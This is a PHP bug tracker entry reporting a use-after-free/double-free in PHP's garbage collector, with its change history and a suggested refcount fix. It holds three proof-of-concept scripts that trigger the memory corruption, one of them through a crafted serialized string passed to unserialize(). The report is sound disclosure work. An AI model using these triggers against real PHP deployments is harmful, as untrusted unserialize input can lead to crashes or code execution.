|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-07-16 18:43 UTC] stas@php.net
-Type: Security
+Type: Bug
-Assigned To:
+Assigned To: dmitry
[2016-07-26 22:28 UTC] nikic@php.net
-Status: Assigned
+Status: Closed
[2016-07-26 22:28 UTC] nikic@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Sun Jul 13 03:01:32 2025 UTC |
Description: ------------ It is possible to lead to use-after-free/double-free vulnerability since @dmitry added this commit 1c84b55adea936b065a20102202bea3d1d243225 to PHP5 series. PoC1: ``` <?php $std = new stdClass; $val = &$std; $std->x = $val; $arr = [$std]; $ref = $arr[0]; unset($arr); gc_collect_cycles(); ?> ``` PoC2: ``` <?php $dll = new SplDoublyLinkedList; $val = &$dll; $dll->push($val); $arr = [$dll]; $ref = $arr[0]; unset($arr); gc_collect_cycles(); ?> ``` PoC3: ``` <?php $inr = 'i:0;:R:2;'; $uns = 'a:1:{i:0;C:19:"SplDoublyLinkedList":'.strlen($inr).':{'.$inr.'}}'; $arr = unserialize($uns); $ref = $arr[0]; unset($arr); gc_collect_cycles(); ?> ``` Fix: ``` +if (obj->refcount <= 0 ) { obj->refcount = 1; +} ```